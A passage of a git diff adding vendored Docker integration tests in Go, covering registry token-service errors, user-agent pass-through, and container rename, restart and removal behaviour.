+	testRequires(c, Network)
+	repoName := "test/busybox"
+	dockerCmd(c, "tag", "busybox", repoName)
+	out, _, err := dockerCmdWithError("push", repoName)
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, check.Not(checker.Contains), "Retrying")
+}
+
+func getTestTokenService(status int, body string, retries int) *httptest.Server {
+	var mu sync.Mutex
+	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		mu.Lock()
+		if retries > 0 {
+			w.WriteHeader(http.StatusServiceUnavailable)
+			w.Header().Set("Content-Type", "application/json")
+			w.Write([]byte(`{"errors":[{"code":"UNAVAILABLE","message":"cannot create token at this time"}]}`))
+			retries--
+		} else {
+			w.WriteHeader(status)
+			w.Header().Set("Content-Type", "application/json")
+			w.Write([]byte(body))
+		}
+		mu.Unlock()
+	}))
+}
+
+func (s *DockerRegistryAuthTokenSuite) TestPushTokenServiceUnauthResponse(c *check.C) {
+	ts := getTestTokenService(http.StatusUnauthorized, `{"errors": [{"Code":"UNAUTHORIZED", "message": "a message", "detail": null}]}`, 0)
+	defer ts.Close()
+	s.setupRegistryWithTokenService(c, ts.URL)
+	repoName := fmt.Sprintf("%s/busybox", privateRegistryURL)
+	dockerCmd(c, "tag", "busybox", repoName)
+	out, _, err := dockerCmdWithError("push", repoName)
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Not(checker.Contains), "Retrying")
+	c.Assert(out, checker.Contains, "unauthorized: a message")
+}
+
+func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseUnauthorized(c *check.C) {
+	ts := getTestTokenService(http.StatusUnauthorized, `{"error": "unauthorized"}`, 0)
+	defer ts.Close()
+	s.setupRegistryWithTokenService(c, ts.URL)
+	repoName := fmt.Sprintf("%s/busybox", privateRegistryURL)
+	dockerCmd(c, "tag", "busybox", repoName)
+	out, _, err := dockerCmdWithError("push", repoName)
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Not(checker.Contains), "Retrying")
+	split := strings.Split(out, "\n")
+	c.Assert(split[len(split)-2], check.Equals, "unauthorized: authentication required")
+}
+
+func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseError(c *check.C) {
+	ts := getTestTokenService(http.StatusTooManyRequests, `{"errors": [{"code":"TOOMANYREQUESTS","message":"out of tokens"}]}`, 4)
+	defer ts.Close()
+	s.setupRegistryWithTokenService(c, ts.URL)
+	repoName := fmt.Sprintf("%s/busybox", privateRegistryURL)
+	dockerCmd(c, "tag", "busybox", repoName)
+	out, _, err := dockerCmdWithError("push", repoName)
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Retrying")
+	c.Assert(out, checker.Not(checker.Contains), "Retrying in 15")
+	split := strings.Split(out, "\n")
+	c.Assert(split[len(split)-2], check.Equals, "toomanyrequests: out of tokens")
+}
+
+func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseUnparsable(c *check.C) {
+	ts := getTestTokenService(http.StatusForbidden, `no way`, 0)
+	defer ts.Close()
+	s.setupRegistryWithTokenService(c, ts.URL)
+	repoName := fmt.Sprintf("%s/busybox", privateRegistryURL)
+	dockerCmd(c, "tag", "busybox", repoName)
+	out, _, err := dockerCmdWithError("push", repoName)
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Not(checker.Contains), "Retrying")
+	split := strings.Split(out, "\n")
+	c.Assert(split[len(split)-2], checker.Contains, "error parsing HTTP 403 response body: ")
+}
+
+func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseNoToken(c *check.C) {
+	ts := getTestTokenService(http.StatusOK, `{"something": "wrong"}`, 0)
+	defer ts.Close()
+	s.setupRegistryWithTokenService(c, ts.URL)
+	repoName := fmt.Sprintf("%s/busybox", privateRegistryURL)
+	dockerCmd(c, "tag", "busybox", repoName)
+	out, _, err := dockerCmdWithError("push", repoName)
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Not(checker.Contains), "Retrying")
+	split := strings.Split(out, "\n")
+	c.Assert(split[len(split)-2], check.Equals, "authorization server did not include a token in the response")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go
new file mode 100644
index 0000000000..fb9a66a541
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go
@@ -0,0 +1,120 @@
+package main
+
+import (
+	"fmt"
+	"net/http"
+	"regexp"
+
+	"github.com/go-check/check"
+)
+
+// unescapeBackslashSemicolonParens unescapes \;()
+func unescapeBackslashSemicolonParens(s string) string {
+	re := regexp.MustCompile(`\\;`)
+	ret := re.ReplaceAll([]byte(s), []byte(";"))
+
+	re = regexp.MustCompile(`\\\(`)
+	ret = re.ReplaceAll([]byte(ret), []byte("("))
+
+	re = regexp.MustCompile(`\\\)`)
+	ret = re.ReplaceAll([]byte(ret), []byte(")"))
+
+	re = regexp.MustCompile(`\\\\`)
+	ret = re.ReplaceAll([]byte(ret), []byte(`\`))
+
+	return string(ret)
+}
+
+func regexpCheckUA(c *check.C, ua string) {
+	re := regexp.MustCompile("(?P<dockerUA>.+) UpstreamClient(?P<upstreamUA>.+)")
+	substrArr := re.FindStringSubmatch(ua)
+
+	c.Assert(substrArr, check.HasLen, 3, check.Commentf("Expected 'UpstreamClient()' with upstream client UA"))
+	dockerUA := substrArr[1]
+	upstreamUAEscaped := substrArr[2]
+
+	// check dockerUA looks correct
+	reDockerUA := regexp.MustCompile("^docker/[0-9A-Za-z+]")
+	bMatchDockerUA := reDockerUA.MatchString(dockerUA)
+	c.Assert(bMatchDockerUA, check.Equals, true, check.Commentf("Docker Engine User-Agent malformed"))
+
+	// check upstreamUA looks correct
+	// Expecting something like:  Docker-Client/1.11.0-dev (linux)
+	upstreamUA := unescapeBackslashSemicolonParens(upstreamUAEscaped)
+	reUpstreamUA := regexp.MustCompile("^\\(Docker-Client/[0-9A-Za-z+]")
+	bMatchUpstreamUA := reUpstreamUA.MatchString(upstreamUA)
+	c.Assert(bMatchUpstreamUA, check.Equals, true, check.Commentf("(Upstream) Docker Client User-Agent malformed"))
+}
+
+func registerUserAgentHandler(reg *testRegistry, result *string) {
+	reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(404)
+		var ua string
+		for k, v := range r.Header {
+			if k == "User-Agent" {
+				ua = v[0]
+			}
+		}
+		*result = ua
+	})
+}
+
+// TestUserAgentPassThrough verifies that when an image is pulled from
+// a registry, the registry should see a User-Agent string of the form
+// [docker engine UA] UptreamClientSTREAM-CLIENT([client UA])
+func (s *DockerRegistrySuite) TestUserAgentPassThrough(c *check.C) {
+	var (
+		buildUA string
+		pullUA  string
+		pushUA  string
+		loginUA string
+	)
+
+	buildReg, err := newTestRegistry(c)
+	c.Assert(err, check.IsNil)
+	registerUserAgentHandler(buildReg, &buildUA)
+	buildRepoName := fmt.Sprintf("%s/busybox", buildReg.hostport)
+
+	pullReg, err := newTestRegistry(c)
+	c.Assert(err, check.IsNil)
+	registerUserAgentHandler(pullReg, &pullUA)
+	pullRepoName := fmt.Sprintf("%s/busybox", pullReg.hostport)
+
+	pushReg, err := newTestRegistry(c)
+	c.Assert(err, check.IsNil)
+	registerUserAgentHandler(pushReg, &pushUA)
+	pushRepoName := fmt.Sprintf("%s/busybox", pushReg.hostport)
+
+	loginReg, err := newTestRegistry(c)
+	c.Assert(err, check.IsNil)
+	registerUserAgentHandler(loginReg, &loginUA)
+
+	err = s.d.Start(
+		"--insecure-registry", buildReg.hostport,
+		"--insecure-registry", pullReg.hostport,
+		"--insecure-registry", pushReg.hostport,
+		"--insecure-registry", loginReg.hostport,
+		"--disable-legacy-registry=true")
+	c.Assert(err, check.IsNil)
+
+	dockerfileName, cleanup1, err := makefile(fmt.Sprintf("FROM %s", buildRepoName))
+	c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile"))
+	defer cleanup1()
+	s.d.Cmd("build", "--file", dockerfileName, ".")
+	regexpCheckUA(c, buildUA)
+
+	s.d.Cmd("login", "-u", "richard", "-p", "testtest", "-e", "testuser@testdomain.com", loginReg.hostport)
+	regexpCheckUA(c, loginUA)
+
+	s.d.Cmd("pull", pullRepoName)
+	regexpCheckUA(c, pullUA)
+
+	dockerfileName, cleanup2, err := makefile(`FROM scratch
+	ENV foo bar`)
+	c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile"))
+	defer cleanup2()
+	s.d.Cmd("build", "-t", pushRepoName, "--file", dockerfileName, ".")
+
+	s.d.Cmd("push", pushRepoName)
+	regexpCheckUA(c, pushUA)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go
new file mode 100644
index 0000000000..373d614b5e
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go
@@ -0,0 +1,138 @@
+package main
+
+import (
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestRenameStoppedContainer(c *check.C) {
+	out, _ := dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh")
+
+	cleanedContainerID := strings.TrimSpace(out)
+	dockerCmd(c, "wait", cleanedContainerID)
+
+	name := inspectField(c, cleanedContainerID, "Name")
+	newName := "new_name" + stringid.GenerateNonCryptoID()
+	dockerCmd(c, "rename", "first_name", newName)
+
+	name = inspectField(c, cleanedContainerID, "Name")
+	c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name))
+
+}
+
+func (s *DockerSuite) TestRenameRunningContainer(c *check.C) {
+	out, _ := dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh")
+
+	newName := "new_name" + stringid.GenerateNonCryptoID()
+	cleanedContainerID := strings.TrimSpace(out)
+	dockerCmd(c, "rename", "first_name", newName)
+
+	name := inspectField(c, cleanedContainerID, "Name")
+	c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name))
+}
+
+func (s *DockerSuite) TestRenameRunningContainerAndReuse(c *check.C) {
+	out, _ := runSleepingContainer(c, "--name", "first_name")
+	c.Assert(waitRun("first_name"), check.IsNil)
+
+	newName := "new_name"
+	ContainerID := strings.TrimSpace(out)
+	dockerCmd(c, "rename", "first_name", newName)
+
+	name := inspectField(c, ContainerID, "Name")
+	c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container"))
+
+	out, _ = runSleepingContainer(c, "--name", "first_name")
+	c.Assert(waitRun("first_name"), check.IsNil)
+	newContainerID := strings.TrimSpace(out)
+	name = inspectField(c, newContainerID, "Name")
+	c.Assert(name, checker.Equals, "/first_name", check.Commentf("Failed to reuse container name"))
+}
+
+func (s *DockerSuite) TestRenameCheckNames(c *check.C) {
+	dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh")
+
+	newName := "new_name" + stringid.GenerateNonCryptoID()
+	dockerCmd(c, "rename", "first_name", newName)
+
+	name := inspectField(c, newName, "Name")
+	c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name))
+
+	result := dockerCmdWithResult("inspect", "-f={{.Name}}", "--type=container", "first_name")
+	c.Assert(result, icmd.Matches, icmd.Expected{
+		ExitCode: 1,
+		Err:      "No such container: first_name",
+	})
+}
+
+func (s *DockerSuite) TestRenameInvalidName(c *check.C) {
+	runSleepingContainer(c, "--name", "myname")
+
+	out, _, err := dockerCmdWithError("rename", "myname", "new:invalid")
+	c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out))
+	c.Assert(out, checker.Contains, "Invalid container name", check.Commentf("%v", err))
+
+	out, _, err = dockerCmdWithError("rename", "myname")
+	c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out))
+	c.Assert(out, checker.Contains, "requires exactly 2 argument(s).", check.Commentf("%v", err))
+
+	out, _, err = dockerCmdWithError("rename", "myname", "")
+	c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out))
+	c.Assert(out, checker.Contains, "may be empty", check.Commentf("%v", err))
+
+	out, _, err = dockerCmdWithError("rename", "", "newname")
+	c.Assert(err, checker.NotNil, check.Commentf("Renaming container with empty name should have failed: %s", out))
+	c.Assert(out, checker.Contains, "may be empty", check.Commentf("%v", err))
+
+	out, _ = dockerCmd(c, "ps", "-a")
+	c.Assert(out, checker.Contains, "myname", check.Commentf("Output of docker ps should have included 'myname': %s", out))
+}
+
+func (s *DockerSuite) TestRenameAnonymousContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	dockerCmd(c, "network", "create", "network1")
+	out, _ := dockerCmd(c, "create", "-it", "--net", "network1", "busybox", "top")
+
+	anonymousContainerID := strings.TrimSpace(out)
+
+	dockerCmd(c, "rename", anonymousContainerID, "container1")
+	dockerCmd(c, "start", "container1")
+
+	count := "-c"
+	if daemonPlatform == "windows" {
+		count = "-n"
+	}
+
+	_, _, err := dockerCmdWithError("run", "--net", "network1", "busybox", "ping", count, "1", "container1")
+	c.Assert(err, check.IsNil, check.Commentf("Embedded DNS lookup fails after renaming anonymous container: %v", err))
+}
+
+func (s *DockerSuite) TestRenameContainerWithSameName(c *check.C) {
+	out, _ := runSleepingContainer(c, "--name", "old")
+	ContainerID := strings.TrimSpace(out)
+
+	out, _, err := dockerCmdWithError("rename", "old", "old")
+	c.Assert(err, checker.NotNil, check.Commentf("Renaming a container with the same name should have failed"))
+	c.Assert(out, checker.Contains, "Renaming a container with the same name", check.Commentf("%v", err))
+
+	out, _, err = dockerCmdWithError("rename", ContainerID, "old")
+	c.Assert(err, checker.NotNil, check.Commentf("Renaming a container with the same name should have failed"))
+	c.Assert(out, checker.Contains, "Renaming a container with the same name", check.Commentf("%v", err))
+}
+
+// Test case for #23973
+func (s *DockerSuite) TestRenameContainerWithLinkedContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	db1, _ := dockerCmd(c, "run", "--name", "db1", "-d", "busybox", "top")
+	dockerCmd(c, "run", "--name", "app1", "-d", "--link", "db1:/mysql", "busybox", "top")
+	dockerCmd(c, "rename", "app1", "app2")
+	out, _, err := dockerCmdWithError("inspect", "--format={{ .Id }}", "app2/mysql")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, strings.TrimSpace(db1))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go
new file mode 100644
index 0000000000..7d585289eb
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go
@@ -0,0 +1,278 @@
+package main
+
+import (
+	"os"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestRestartStoppedContainer(c *check.C) {
+	dockerCmd(c, "run", "--name=test", "busybox", "echo", "foobar")
+	cleanedContainerID, err := getIDByName("test")
+	c.Assert(err, check.IsNil)
+
+	out, _ := dockerCmd(c, "logs", cleanedContainerID)
+	c.Assert(out, checker.Equals, "foobar\n")
+
+	dockerCmd(c, "restart", cleanedContainerID)
+
+	// Wait until the container has stopped
+	err = waitInspect(cleanedContainerID, "{{.State.Running}}", "false", 20*time.Second)
+	c.Assert(err, checker.IsNil)
+
+	out, _ = dockerCmd(c, "logs", cleanedContainerID)
+	c.Assert(out, checker.Equals, "foobar\nfoobar\n")
+}
+
+func (s *DockerSuite) TestRestartRunningContainer(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "echo foobar && sleep 30 && echo 'should not print this'")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	c.Assert(waitRun(cleanedContainerID), checker.IsNil)
+
+	out, _ = dockerCmd(c, "logs", cleanedContainerID)
+	c.Assert(out, checker.Equals, "foobar\n")
+
+	dockerCmd(c, "restart", "-t", "1", cleanedContainerID)
+
+	out, _ = dockerCmd(c, "logs", cleanedContainerID)
+
+	c.Assert(waitRun(cleanedContainerID), checker.IsNil)
+
+	c.Assert(out, checker.Equals, "foobar\nfoobar\n")
+}
+
+// Test that restarting a container with a volume does not create a new volume on restart. Regression test for #819.
+func (s *DockerSuite) TestRestartWithVolumes(c *check.C) {
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+	out, _ := runSleepingContainer(c, "-d", "-v", prefix+slash+"test")
+
+	cleanedContainerID := strings.TrimSpace(out)
+	out, err := inspectFilter(cleanedContainerID, "len .Mounts")
+	c.Assert(err, check.IsNil, check.Commentf("failed to inspect %s: %s", cleanedContainerID, out))
+	out = strings.Trim(out, " \n\r")
+	c.Assert(out, checker.Equals, "1")
+
+	source, err := inspectMountSourceField(cleanedContainerID, prefix+slash+"test")
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "restart", cleanedContainerID)
+
+	out, err = inspectFilter(cleanedContainerID, "len .Mounts")
+	c.Assert(err, check.IsNil, check.Commentf("failed to inspect %s: %s", cleanedContainerID, out))
+	out = strings.Trim(out, " \n\r")
+	c.Assert(out, checker.Equals, "1")
+
+	sourceAfterRestart, err := inspectMountSourceField(cleanedContainerID, prefix+slash+"test")
+	c.Assert(err, checker.IsNil)
+	c.Assert(source, checker.Equals, sourceAfterRestart)
+}
+
+func (s *DockerSuite) TestRestartPolicyNO(c *check.C) {
+	out, _ := dockerCmd(c, "create", "--restart=no", "busybox")
+
+	id := strings.TrimSpace(string(out))
+	name := inspectField(c, id, "HostConfig.RestartPolicy.Name")
+	c.Assert(name, checker.Equals, "no")
+}
+
+func (s *DockerSuite) TestRestartPolicyAlways(c *check.C) {
+	out, _ := dockerCmd(c, "create", "--restart=always", "busybox")
+
+	id := strings.TrimSpace(string(out))
+	name := inspectField(c, id, "HostConfig.RestartPolicy.Name")
+	c.Assert(name, checker.Equals, "always")
+
+	MaximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount")
+
+	// MaximumRetryCount=0 if the restart policy is always
+	c.Assert(MaximumRetryCount, checker.Equals, "0")
+}
+
+func (s *DockerSuite) TestRestartPolicyOnFailure(c *check.C) {
+	out, _, err := dockerCmdWithError("create", "--restart=on-failure:-1", "busybox")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "maximum retry count cannot be negative")
+
+	out, _ = dockerCmd(c, "create", "--restart=on-failure:1", "busybox")
+
+	id := strings.TrimSpace(string(out))
+	name := inspectField(c, id, "HostConfig.RestartPolicy.Name")
+	maxRetry := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount")
+
+	c.Assert(name, checker.Equals, "on-failure")
+	c.Assert(maxRetry, checker.Equals, "1")
+
+	out, _ = dockerCmd(c, "create", "--restart=on-failure:0", "busybox")
+
+	id = strings.TrimSpace(string(out))
+	name = inspectField(c, id, "HostConfig.RestartPolicy.Name")
+	maxRetry = inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount")
+
+	c.Assert(name, checker.Equals, "on-failure")
+	c.Assert(maxRetry, checker.Equals, "0")
+
+	out, _ = dockerCmd(c, "create", "--restart=on-failure", "busybox")
+
+	id = strings.TrimSpace(string(out))
+	name = inspectField(c, id, "HostConfig.RestartPolicy.Name")
+	maxRetry = inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount")
+
+	c.Assert(name, checker.Equals, "on-failure")
+	c.Assert(maxRetry, checker.Equals, "0")
+}
+
+// a good container with --restart=on-failure:3
+// MaximumRetryCount!=0; RestartCount=0
+func (s *DockerSuite) TestRestartContainerwithGoodContainer(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "true")
+
+	id := strings.TrimSpace(string(out))
+	err := waitInspect(id, "{{ .State.Restarting }} {{ .State.Running }}", "false false", 30*time.Second)
+	c.Assert(err, checker.IsNil)
+
+	count := inspectField(c, id, "RestartCount")
+	c.Assert(count, checker.Equals, "0")
+
+	MaximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount")
+	c.Assert(MaximumRetryCount, checker.Equals, "3")
+
+}
+
+func (s *DockerSuite) TestRestartContainerSuccess(c *check.C) {
+	testRequires(c, SameHostDaemon)
+
+	out, _ := runSleepingContainer(c, "-d", "--restart=always")
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), check.IsNil)
+
+	pidStr := inspectField(c, id, "State.Pid")
+
+	pid, err := strconv.Atoi(pidStr)
+	c.Assert(err, check.IsNil)
+
+	p, err := os.FindProcess(pid)
+	c.Assert(err, check.IsNil)
+	c.Assert(p, check.NotNil)
+
+	err = p.Kill()
+	c.Assert(err, check.IsNil)
+
+	err = waitInspect(id, "{{.RestartCount}}", "1", 30*time.Second)
+	c.Assert(err, check.IsNil)
+
+	err = waitInspect(id, "{{.State.Status}}", "running", 30*time.Second)
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestRestartWithPolicyUserDefinedNetwork(c *check.C) {
+	// TODO Windows. This may be portable following HNS integration post TP5.
+	testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace, NotArm)
+	dockerCmd(c, "network", "create", "-d", "bridge", "udNet")
+
+	dockerCmd(c, "run", "-d", "--net=udNet", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+
+	dockerCmd(c, "run", "-d", "--restart=always", "--net=udNet", "--name=second",
+		"--link=first:foo", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// ping to first and its alias foo must succeed
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo")
+	c.Assert(err, check.IsNil)
+
+	// Now kill the second container and let the restart policy kick in
+	pidStr := inspectField(c, "second", "State.Pid")
+
+	pid, err := strconv.Atoi(pidStr)
+	c.Assert(err, check.IsNil)
+
+	p, err := os.FindProcess(pid)
+	c.Assert(err, check.IsNil)
+	c.Assert(p, check.NotNil)
+
+	err = p.Kill()
+	c.Assert(err, check.IsNil)
+
+	err = waitInspect("second", "{{.RestartCount}}", "1", 5*time.Second)
+	c.Assert(err, check.IsNil)
+
+	err = waitInspect("second", "{{.State.Status}}", "running", 5*time.Second)
+
+	// ping to first and its alias foo must still succeed
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo")
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestRestartPolicyAfterRestart(c *check.C) {
+	testRequires(c, SameHostDaemon)
+
+	out, _ := runSleepingContainer(c, "-d", "--restart=always")
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), check.IsNil)
+
+	dockerCmd(c, "restart", id)
+
+	c.Assert(waitRun(id), check.IsNil)
+
+	pidStr := inspectField(c, id, "State.Pid")
+
+	pid, err := strconv.Atoi(pidStr)
+	c.Assert(err, check.IsNil)
+
+	p, err := os.FindProcess(pid)
+	c.Assert(err, check.IsNil)
+	c.Assert(p, check.NotNil)
+
+	err = p.Kill()
+	c.Assert(err, check.IsNil)
+
+	err = waitInspect(id, "{{.RestartCount}}", "1", 30*time.Second)
+	c.Assert(err, check.IsNil)
+
+	err = waitInspect(id, "{{.State.Status}}", "running", 30*time.Second)
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestRestartContainerwithRestartPolicy(c *check.C) {
+	out1, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "false")
+	out2, _ := dockerCmd(c, "run", "-d", "--restart=always", "busybox", "false")
+
+	id1 := strings.TrimSpace(string(out1))
+	id2 := strings.TrimSpace(string(out2))
+	waitTimeout := 15 * time.Second
+	if daemonPlatform == "windows" {
+		waitTimeout = 150 * time.Second
+	}
+	err := waitInspect(id1, "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTimeout)
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "restart", id1)
+	dockerCmd(c, "restart", id2)
+
+	dockerCmd(c, "stop", id1)
+	dockerCmd(c, "stop", id2)
+	dockerCmd(c, "start", id1)
+	dockerCmd(c, "start", id2)
+}
+
+func (s *DockerSuite) TestRestartAutoRemoveContainer(c *check.C) {
+	out, _ := runSleepingContainer(c, "--rm")
+
+	id := strings.TrimSpace(string(out))
+	dockerCmd(c, "restart", id)
+	err := waitInspect(id, "{{ .State.Restarting }} {{ .State.Running }}", "false true", 15*time.Second)
+	c.Assert(err, checker.IsNil)
+
+	out, _ = dockerCmd(c, "ps")
+	c.Assert(out, checker.Contains, id[:12], check.Commentf("container should be restarted instead of removed: %v", out))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go
new file mode 100644
index 0000000000..0186c56741
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go
@@ -0,0 +1,86 @@
+package main
+
+import (
+	"io/ioutil"
+	"os"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestRmContainerWithRemovedVolume(c *check.C) {
+	testRequires(c, SameHostDaemon)
+
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+
+	tempDir, err := ioutil.TempDir("", "test-rm-container-with-removed-volume-")
+	if err != nil {
+		c.Fatalf("failed to create temporary directory: %s", tempDir)
+	}
+	defer os.RemoveAll(tempDir)
+
+	dockerCmd(c, "run", "--name", "losemyvolumes", "-v", tempDir+":"+prefix+slash+"test", "busybox", "true")
+
+	err = os.RemoveAll(tempDir)
+	c.Assert(err, check.IsNil)
+
+	dockerCmd(c, "rm", "-v", "losemyvolumes")
+}
+
+func (s *DockerSuite) TestRmContainerWithVolume(c *check.C) {
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+
+	dockerCmd(c, "run", "--name", "foo", "-v", prefix+slash+"srv", "busybox", "true")
+
+	dockerCmd(c, "rm", "-v", "foo")
+}
+
+func (s *DockerSuite) TestRmContainerRunning(c *check.C) {
+	createRunningContainer(c, "foo")
+
+	_, _, err := dockerCmdWithError("rm", "foo")
+	c.Assert(err, checker.NotNil, check.Commentf("Expected error, can't rm a running container"))
+}
+
+func (s *DockerSuite) TestRmContainerForceRemoveRunning(c *check.C) {
+	createRunningContainer(c, "foo")
+
+	// Stop then remove with -s
+	dockerCmd(c, "rm", "-f", "foo")
+}
+
+func (s *DockerSuite) TestRmContainerOrphaning(c *check.C) {
+	dockerfile1 := `FROM busybox:latest
+	ENTRYPOINT ["true"]`
+	img := "test-container-orphaning"
+	dockerfile2 := `FROM busybox:latest
+	ENTRYPOINT ["true"]
+	MAINTAINER Integration Tests`
+
+	// build first dockerfile
+	img1, err := buildImage(img, dockerfile1, true)
+	c.Assert(err, check.IsNil, check.Commentf("Could not build image %s", img))
+	// run container on first image
+	dockerCmd(c, "run", img)
+	// rebuild dockerfile with a small addition at the end
+	_, err = buildImage(img, dockerfile2, true)
+	c.Assert(err, check.IsNil, check.Commentf("Could not rebuild image %s", img))
+	// try to remove the image, should not error out.
+	out, _, err := dockerCmdWithError("rmi", img)
+	c.Assert(err, check.IsNil, check.Commentf("Expected to removing the image, but failed: %s", out))
+
+	// check if we deleted the first image
+	out, _ = dockerCmd(c, "images", "-q", "--no-trunc")
+	c.Assert(out, checker.Contains, img1, check.Commentf("Orphaned container (could not find %q in docker images): %s", img1, out))
+
+}
+
+func (s *DockerSuite) TestRmInvalidContainer(c *check.C) {
+	out, _, err := dockerCmdWithError("rm", "unknown")
+	c.Assert(err, checker.NotNil, check.Commentf("Expected error on rm unknown container, got none"))
+	c.Assert(out, checker.Contains, "No such container")
+}
+
+func createRunningContainer(c *check.C, name string) {
+	runSleepingContainer(c, "-dt", "--name", name)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go
new file mode 100644
index 0000000000..cb16d9d88c
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go
@@ -0,0 +1,352 @@
+package main
+
+import (
+	"fmt"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestRmiWithContainerFails(c *check.C) {
+	errSubstr := "is using it"
+
+	// create a container
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	// try to delete the image
+	out, _, err := dockerCmdWithError("rmi", "busybox")
+	// Container is using image, should not be able to rmi
+	c.Assert(err, checker.NotNil)
+	// Container is using image, error message should contain errSubstr
+	c.Assert(out, checker.Contains, errSubstr, check.Commentf("Container: %q", cleanedContainerID))
+
+	// make sure it didn't delete the busybox name
+	images, _ := dockerCmd(c, "images")
+	// The name 'busybox' should not have been removed from images
+	c.Assert(images, checker.Contains, "busybox")
+}
+
+func (s *DockerSuite) TestRmiTag(c *check.C) {
+	imagesBefore, _ := dockerCmd(c, "images", "-a")
+	dockerCmd(c, "tag", "busybox", "utest:tag1")
